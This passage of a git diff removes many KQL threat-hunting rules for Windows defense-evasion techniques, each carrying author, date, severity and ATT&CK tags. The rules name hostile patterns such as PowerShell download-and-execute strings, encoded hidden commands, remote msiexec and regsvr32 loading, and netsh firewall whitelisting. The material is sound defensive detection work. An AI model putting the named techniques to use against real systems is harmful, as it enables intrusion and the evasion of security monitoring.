-| where ((ProcessCommandLine contains " -y" or ProcessCommandLine contains " /y") and FolderPath endswith "\\msiexec.exe") and (not((ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" /Y C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y C:\\Windows\\CCM\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql b/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql
deleted file mode 100644
index e611a0b5..00000000
--- a/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/28
-// Level: medium
-// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly
-// Tags: attack.defense_evasion, attack.t1218.007
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q") and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql b/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql
deleted file mode 100644
index 6b585da4..00000000
--- a/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters
-// Tags: attack.defense_evasion
-DeviceNetworkEvents
-| where ((InitiatingProcessCommandLine endswith "\\regsvr32.exe" or InitiatingProcessCommandLine endswith "\\rundll32.exe" or InitiatingProcessCommandLine endswith "\\dllhost.exe") and (InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql b/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql
deleted file mode 100644
index 9f1cde1d..00000000
--- a/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/11
-// Level: high
-// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "IAAtAGIAeABvAHIAIAAwAHgA" or ProcessCommandLine contains "AALQBiAHgAbwByACAAMAB4A" or ProcessCommandLine contains "gAC0AYgB4AG8AcgAgADAAeA" or ProcessCommandLine contains "AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg" or ProcessCommandLine contains "AuAEkAbgB2AG8AawBlACgAKQAgAHwAI" or ProcessCommandLine contains "ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AJwAgAC0AZgAg"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql b/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql
deleted file mode 100644
index 5bad9e78..00000000
--- a/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
-// Date: 2019/04/08
-// Level: medium
-// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
-This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
-
-// Tags: attack.t1562.001, attack.defense_evasion
-DeviceFileEvents
-| where (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "PROCEXP152.sys") and (not((InitiatingProcessFolderPath contains "\\procexp64.exe" or InitiatingProcessFolderPath contains "\\procexp.exe" or InitiatingProcessFolderPath contains "\\procmon64.exe" or InitiatingProcessFolderPath contains "\\procmon.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql b/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql
deleted file mode 100644
index 3d30e123..00000000
--- a/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/06
-// Level: high
-// Description: Detect execution of suspicious double extension files in ParentCommandLine
-// Tags: attack.defense_evasion, attack.t1036.007
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith ".doc.lnk" or InitiatingProcessFolderPath endswith ".docx.lnk" or InitiatingProcessFolderPath endswith ".xls.lnk" or InitiatingProcessFolderPath endswith ".xlsx.lnk" or InitiatingProcessFolderPath endswith ".ppt.lnk" or InitiatingProcessFolderPath endswith ".pptx.lnk" or InitiatingProcessFolderPath endswith ".rtf.lnk" or InitiatingProcessFolderPath endswith ".pdf.lnk" or InitiatingProcessFolderPath endswith ".txt.lnk" or InitiatingProcessFolderPath endswith ".doc.js" or InitiatingProcessFolderPath endswith ".docx.js" or InitiatingProcessFolderPath endswith ".xls.js" or InitiatingProcessFolderPath endswith ".xlsx.js" or InitiatingProcessFolderPath endswith ".ppt.js" or InitiatingProcessFolderPath endswith ".pptx.js" or InitiatingProcessFolderPath endswith ".rtf.js" or InitiatingProcessFolderPath endswith ".pdf.js" or InitiatingProcessFolderPath endswith ".txt.js") or (InitiatingProcessCommandLine contains ".doc.lnk" or InitiatingProcessCommandLine contains ".docx.lnk" or InitiatingProcessCommandLine contains ".xls.lnk" or InitiatingProcessCommandLine contains ".xlsx.lnk" or InitiatingProcessCommandLine contains ".ppt.lnk" or InitiatingProcessCommandLine contains ".pptx.lnk" or InitiatingProcessCommandLine contains ".rtf.lnk" or InitiatingProcessCommandLine contains ".pdf.lnk" or InitiatingProcessCommandLine contains ".txt.lnk" or InitiatingProcessCommandLine contains ".doc.js" or InitiatingProcessCommandLine contains ".docx.js" or InitiatingProcessCommandLine contains ".xls.js" or InitiatingProcessCommandLine contains ".xlsx.js" or InitiatingProcessCommandLine contains ".ppt.js" or InitiatingProcessCommandLine contains ".pptx.js" or InitiatingProcessCommandLine contains ".rtf.js" or InitiatingProcessCommandLine contains ".pdf.js" or InitiatingProcessCommandLine contains ".txt.js")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql b/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql
deleted file mode 100644
index 539f1c04..00000000
--- a/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/11/21
-// Level: high
-// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
-Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
-IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Control\\Keyboard Layouts" and RegistryKey contains "Ime File") and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql b/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql
deleted file mode 100644
index aeaaf597..00000000
--- a/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/05
-// Level: medium
-// Description: Detects suspicious PowerShell invocation command parameters
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "[Convert]::FromBase64String") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-ep" and ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-Enc") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-noni" and ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object") or (ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object" and ProcessCommandLine contains "Net.WebClient" and ProcessCommandLine contains ".Download") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "\\software\\") or (ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-noprofile" and ProcessCommandLine contains "-windowstyle" and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "new-object" and ProcessCommandLine contains "system.net.webclient" and ProcessCommandLine contains ".download")) and (not((ProcessCommandLine contains "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" or ProcessCommandLine contains "Write-ChocolateyWarning")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql b/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql
deleted file mode 100644
index c2209f70..00000000
--- a/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\powercfg.exe" or ProcessVersionInfoOriginalFileName =~ "PowerCfg.exe") and ((ProcessCommandLine contains "/setacvalueindex " and ProcessCommandLine contains "SCHEME_CURRENT" and ProcessCommandLine contains "SUB_VIDEO" and ProcessCommandLine contains "VIDEOCONLOCK") or (ProcessCommandLine contains "-change " and ProcessCommandLine contains "-standby-timeout-"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql b/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql
deleted file mode 100644
index 317441d1..00000000
--- a/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/12
-// Level: high
-// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution.
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Process_Parents.kql b/Defense Evasion/Suspicious_Process_Parents.kql
deleted file mode 100644
index f2a0aaef..00000000
--- a/Defense Evasion/Suspicious_Process_Parents.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/21
-// Level: high
-// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\minesweeper.exe" or InitiatingProcessFolderPath endswith "\\winver.exe" or InitiatingProcessFolderPath endswith "\\bitsadmin.exe") or ((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\eventvwr.exe" or InitiatingProcessFolderPath endswith "\\calc.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe") and (not((isnull(FolderPath) or (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\mmc.exe" or FolderPath endswith "\\win32calc.exe" or FolderPath endswith "\\notepad.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Process_Start_Locations.kql b/Defense Evasion/Suspicious_Process_Start_Locations.kql
deleted file mode 100644
index 3bd09343..00000000
--- a/Defense Evasion/Suspicious_Process_Start_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4, Jonhnathan Ribeiro, oscd.community
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious process run from unusual locations
-// Tags: attack.defense_evasion, attack.t1036, car.2013-05-002
-DeviceProcessEvents
-| where (FolderPath contains ":\\RECYCLER\\" or FolderPath contains ":\\SystemVolumeInformation\\") or (FolderPath startswith "C:\\Windows\\Tasks\\" or FolderPath startswith "C:\\Windows\\debug\\" or FolderPath startswith "C:\\Windows\\fonts\\" or FolderPath startswith "C:\\Windows\\help\\" or FolderPath startswith "C:\\Windows\\drivers\\" or FolderPath startswith "C:\\Windows\\addins\\" or FolderPath startswith "C:\\Windows\\cursors\\" or FolderPath startswith "C:\\Windows\\system32\\tasks\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql b/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql
deleted file mode 100644
index f47e40f1..00000000
--- a/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
-// Date: 2020/05/25
-// Level: high
-// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "allowedprogram") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "action=allow" and ProcessCommandLine contains "program=")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and (ProcessCommandLine contains ":\\$Recycle.bin\\" or ProcessCommandLine contains ":\\RECYCLER.BIN\\" or ProcessCommandLine contains ":\\RECYCLERS.BIN\\" or ProcessCommandLine contains ":\\SystemVolumeInformation\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Desktop\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\addins\\" or ProcessCommandLine contains ":\\Windows\\cursors\\" or ProcessCommandLine contains ":\\Windows\\debug\\" or ProcessCommandLine contains ":\\Windows\\drivers\\" or ProcessCommandLine contains ":\\Windows\\fonts\\" or ProcessCommandLine contains ":\\Windows\\help\\" or ProcessCommandLine contains ":\\Windows\\system32\\tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Local Settings\\Temporary Internet Files\\" or ProcessCommandLine contains "\\Temporary Internet Files\\Content.Outlook\\" or ProcessCommandLine contains "%Public%\\" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql b/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql
deleted file mode 100644
index 85a9b22b..00000000
--- a/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/08
-// Level: high
-// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")) and InitiatingProcessFolderPath endswith "\\provlaunch.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_RASdial_Activity.kql b/Defense Evasion/Suspicious_RASdial_Activity.kql
deleted file mode 100644
index 4e30f528..00000000
--- a/Defense Evasion/Suspicious_RASdial_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious process related to rasdial.exe
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where FolderPath endswith "rasdial.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Recursive_Takeown.kql b/Defense Evasion/Suspicious_Recursive_Takeown.kql
deleted file mode 100644
index 505ce3d4..00000000
--- a/Defense Evasion/Suspicious_Recursive_Takeown.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/30
-// Level: medium
-// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
-// Tags: attack.defense_evasion, attack.t1222.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/f " and ProcessCommandLine contains "/r") and FolderPath endswith "\\takeown.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql b/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql
deleted file mode 100644
index e5f98406..00000000
--- a/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Eli Salem, Sander Wiebing, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and ProcessCommandLine matches regex ":[^ \\\\]"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql b/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql
deleted file mode 100644
index 57c97c53..00000000
--- a/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/31
-// Level: high
-// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql b/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql
deleted file mode 100644
index 46923deb..00000000
--- a/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: high
-// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not((ProcessCommandLine contains ".rsp" or (ProcessCommandLine contains ".exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"" and FolderPath =~ "C:\\Windows\\System32\\odbcconf.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\runonce.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql b/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql
deleted file mode 100644
index 100ed93b..00000000
--- a/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/05
-// Level: high
-// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "rundll32.exe" and (ProcessCommandLine contains ".sys," or ProcessCommandLine contains ".sys ")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql b/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql
deleted file mode 100644
index 2167b106..00000000
--- a/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Hieu Tran
-// Date: 2023/03/13
-// Level: high
-// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".cr2" or ProcessCommandLine contains ".eps" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".ico" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".nef" or ProcessCommandLine contains ".orf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".raw" or ProcessCommandLine contains ".sr2" or ProcessCommandLine contains ".tif" or ProcessCommandLine contains ".tiff") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql b/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql
deleted file mode 100644
index 3d521133..00000000
--- a/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/05
-// Level: high
-// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "Execute" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql b/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql
deleted file mode 100644
index c3719d26..00000000
--- a/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where FolderPath endswith "\\runonce.exe" and (InitiatingProcessCommandLine contains "setupapi.dll" and InitiatingProcessCommandLine contains "InstallHinfSection") and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Runscripthelper.exe.kql b/Defense Evasion/Suspicious_Runscripthelper.exe.kql
deleted file mode 100644
index 568eff5f..00000000
--- a/Defense Evasion/Suspicious_Runscripthelper.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects execution of powershell scripts via Runscripthelper.exe
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql b/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql
deleted file mode 100644
index 76673450..00000000
--- a/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
-// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027
-DeviceProcessEvents
